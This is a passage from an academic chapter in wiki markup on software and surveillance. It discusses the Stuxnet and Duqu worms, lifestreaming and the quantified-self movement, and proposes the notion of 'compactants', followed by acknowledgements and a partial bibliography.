cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. 
The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. 
Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for the kind permission to use his work, 'The sublime brain [of Jonathon]', for the cover of the book which represents a neuronal frontal portait of an individual, for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture&amp;amp;nbsp;Desire', ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken.', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) ''New Stuxnet' worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu '' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
